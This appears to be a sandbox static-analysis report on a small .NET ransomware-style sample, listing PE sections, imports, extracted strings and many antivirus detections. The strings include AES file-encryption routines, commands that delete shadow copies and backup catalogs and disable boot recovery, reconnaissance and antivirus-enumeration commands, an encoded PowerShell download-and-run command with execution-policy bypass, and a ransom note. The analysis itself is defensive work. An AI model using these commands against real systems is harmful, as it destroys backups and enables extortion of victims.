Static | ZeroBOX

PE Compile Time

1970-01-01 09:00:00

PE Imphash

f34d5f2d4577ed6d9ceec516c1f5a744

Sections

Name Virtual Address Virtual Size Size of Raw Data Entropy
.text 0x00002000 0x00002244 0x00002400 4.61651939107
.sdata 0x00006000 0x00000008 0x00000200 0.162990075305
.rsrc 0x00008000 0x000002d8 0x00000400 2.31642427804
.reloc 0x0000a000 0x0000000c 0x00000200 0.0776331623432

Resources

Name Offset Size Language Sub-language File type
RT_VERSION 0x00008058 0x00000280 LANG_NEUTRAL SUBLANG_NEUTRAL data

Imports

Library mscoree.dll:
0x402000 _CorExeMain

!This program cannot be run in DOS mode.
`.sdata
@.reloc
v4.0.30319
#Strings
<Module>
HelloWorld
CoreEncryption
CoreDecryption
EncryptionFile
DecryptionFile
bytesToBeEncrypted
passwordBytes
System
<PrivateImplementationDetails>
$ArrayType=8
$field-DD5783BCF1E9002BC00AD5B83A95ED6E4EBB4AD5
RuntimeHelpers
System.Runtime.CompilerServices
InitializeArray
RuntimeFieldHandle
MemoryStream
System.IO
RijndaelManaged
System.Security.Cryptography
SymmetricAlgorithm
set_KeySize
set_BlockSize
Rfc2898DeriveBytes
get_KeySize
DeriveBytes
GetBytes
set_Key
get_BlockSize
set_IV
set_Mode
CipherMode
CryptoStream
CreateEncryptor
ICryptoTransform
Stream
CryptoStreamMode
IDisposable
Dispose
ToArray
Object
bytesToBeDecrypted
CreateDecryptor
password
ReadAllBytes
Encoding
System.Text
get_UTF8
SHA256
Create
HashAlgorithm
ComputeHash
WriteAllBytes
fileEncrypted
Console
WriteLine
String
op_Equality
OSPlatform
System.Runtime.InteropServices
get_Linux
RuntimeInformation
IsOSPlatform
Thread
System.Threading
Process
System.Diagnostics
Convert
FromBase64String
GetString
WriteAllText
decrypt
Directory
GetFiles
SearchOption
EndsWith
Concat
get_Length
Substring
CompilerGeneratedAttribute
AES_Encrypt
AES_Decrypt
EncryptFile
DecryptFile
ValueType
RuntimeCompatibilityAttribute
mscorlib
hello.exe
WrapNonExceptionThrows
_CorExeMain
mscoree.dll
Hello World!
-decrypt
@ Anyone who thinks they need to analyze this file: it is just to demonstrate traces
cmd.exe
/c vssadmin Delete Shadows /All /Quiet
/c cdedit.exe /set {{default}} bootstatuspolicy ignoreallfailures & bcdedit /set {{default}} recoveryenabled no
/c wbadmin.exe delete catalog -quiet
/c wmic shadowcopy delete
/c whoami
/c wmic USERACCOUNT Get Domain,Name,Sid
/c wmic NTDOMAIN GET DomainControllerAddress,DomainName,Roles /VALUE
/c wmic /namespace:\\root\securitycenter2 path antivirusproduct
-exec bypass -enc SQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAHIAaQAgACIAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AaQB0AHAAcgBvAHQAbwBkAGEAeQAuAGMAbwBtAC8AcwBpAHQAZQBzAC8AaQB0AHAAcgBvAHQAbwBkAGEAeQAuAGMAbwBtAC8AZgBpAGwAZQBzAC8AcwB0AHkAbABlAHMALwBhAHIAdABpAGMAbABlAF8AZgBlAGEAdAB1AHIAZQBkAF8AcgBlAHQAaQBuAGEALwBwAHUAYgBsAGkAYwAvAHIAYQBuAHMAbwBtAHcAYQByAGUALQBhAHQAdABhAGMAawAuAGoAcABnAD8AaQB0AG8AawA9AFoAeAB2AHIAcgBfADQARgAiACAALQBPAHUAdABGAGkAbABlACAAIgByAGEAbgBzAG8AbQAuAGoAcABnACIAIAANAAoAIAAgACAAIABzAGUAdAAtAGkAdABlAG0AcAByAG8AcABlAHIAdAB5ACAALQBwAGEAdABoACAAIgBIAEsAQwBVADoAXABDAG8AbgB0AHIAbwBsACAAUABhAG4AZQBsAFwARABlAHMAawB0AG8AcAAiACAALQBuAGEAbQBlACAAVwBhAGwAbABQAGEAcABlAHIAIAAtAHYAYQBsAHUAZQAgAHIAYQBuAHMAbwBtAC4AagBwAGcADQAKACAAIAAgACAAIwBuAGUAZQBkAGUAZAAgAHQAbwAgAGEAYwB0AHUAYQBsAGwAeQAgAGMAaABhAG4AZwBlACAAdABoAGUAIABiAGEAYwBrAGcAcgBvAHUAbgBkACAAYwBvAG4AcwBpAHMAdABlAG4AdABsAHkAIAANAAoAIAAgACAAIABTAGwAZQBlAHAAIAAtAHMAZQBjAG8AbgBkAHMAIAA1AA0ACgAgACAAIAAgACAAUgBVAE4ARABMAEwAMwAyAC4ARQBYAEUAIABVAFMARQBSADMAMgAuA
PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PQpUaGlzIFBDIGhhcyBiZWVuIGluZmVjdGVkIGJ5IE9TVC1DcnlwdAo9PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09CgpBbGwgeWVyIHByZWNpb3VzIGZpbGV6eiBhcmUgZ29uZSBub3cgOykKTm8gd29ycmllcyBmb3IganVzdCAzMDAkIHlvdSBjYW4gaGF2ZSB0aGVtIGJhY2suLi4KClRvIGRlY29kZSBjb250YWN0OiByYW5zb21Abm90ZXhpc3RhbnQudG8KCgo9PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09Cj09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT0KanVzdCBraWRkaW5nOiBwYXNzd29yZCBpcyAiYWJjZCIKcnVuIGJpbmFyeSB3aXRoOiAuL2hlbGxvLmV4ZSAtZGVjcnlwdCB0byBkZWNyeXB0
ransomnote.txt
File already encrypted
Glad you decided to do the right thing! Thanks for the money, here are your files:
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
007f04b0
Comments
CompanyName
FileDescription
FileVersion
0.0.0.0
InternalName
LegalCopyright
LegalTrademarks
OriginalFilename
hello.exe
ProductName
ProductVersion
Antivirus Signature
Bkav W32.AIDetectMalware.CS
Lionic Trojan.Win32.DelShad.4!c
Elastic malicious (high confidence)
ClamAV Clean
CMC Clean
CAT-QuickHeal Clean
Skyhigh Artemis!Trojan
ALYac Trojan.Ransom.Filecoder
Cylance Unsafe
Zillya Trojan.Filecoder.Win32.19564
CrowdStrike win/malicious_confidence_100% (W)
Alibaba Trojan:MSIL/DelShad.9789387d
K7GW Riskware ( 0040eff71 )
K7AntiVirus Riskware ( 0040eff71 )
huorong Ransom/BTCware.d
Baidu Clean
VirIT Trojan.Win32.MSIL_Heur.A
Paloalto generic.ml
Symantec Trojan.Gen.MBT
tehtris Clean
ESET-NOD32 MSIL/Filecoder.AJD
APEX Clean
Avast Win32:Trojan-gen
Cynet Clean
Kaspersky HEUR:Trojan.MSIL.DelShad.gen
BitDefender Gen:Heur.Ransom.REntS.Gen.1
NANO-Antivirus Clean
ViRobot Trojan.Win32.Z.Ransom.12288.B
MicroWorld-eScan Gen:Heur.Ransom.REntS.Gen.1
Tencent Msil.Trojan.Delshad.Xylw
Sophos Troj/Ransom-GMO
F-Secure Trojan.TR/Dropper.MSIL.Gen
DrWeb Trojan.Inject4.39187
VIPRE Gen:Heur.Ransom.REntS.Gen.1
TrendMicro Trojan.MSIL.DELSHAD.R002C0REG22
McAfeeD ti!C36728E99F92
Trapmine malicious.moderate.ml.score
CTX exe.trojan.msil
Emsisoft Gen:Heur.Ransom.REntS.Gen.1 (B)
Ikarus Trojan.Dropper
FireEye Generic.mg.69d1c11ae24884ea
Jiangmin Trojan.MSIL.alqsb
Webroot Clean
Varist W32/ABTrojan.MHHW-1268
Avira TR/Dropper.MSIL.Gen
Fortinet MSIL/Filecoder.AD0C!tr.ransom
Antiy-AVL Trojan/MSIL.DelShad
Kingsoft malware.kb.c.998
Gridinsoft Ransom.Win32.Gen.oa!s1
Xcitium Malware@#2f4a7b1d4brjg
Arcabit Trojan.Ransom.REntS.Gen.1
SUPERAntiSpyware Clean
ZoneAlarm HEUR:Trojan.MSIL.DelShad.gen
Microsoft Trojan:MSIL/Cryptor
Google Detected
AhnLab-V3 Trojan/Win.Generic.C4526428
Acronis Clean
McAfee Artemis!69D1C11AE248
TACHYON Clean
VBA32 Trojan.MSIL.DelShad.Heur
Malwarebytes Malware.AI.3847531411
Panda Trj/GdSda.A
Zoner Clean
TrendMicro-HouseCall Trojan.MSIL.DELSHAD.R002C0REG22
Rising Ransom.Filecoder!8.55A8 (CLOUD)
Yandex Trojan.DR.MSIL!pGrm+sv47ao
SentinelOne Static AI - Malicious PE
MaxSecure Trojan.Malware.300983.susgen
GData MSIL.Trojan-Ransom.Filecoder.BJ
AVG Win32:Trojan-gen
DeepInstinct MALICIOUS
alibabacloud Clean
No IRMA results available.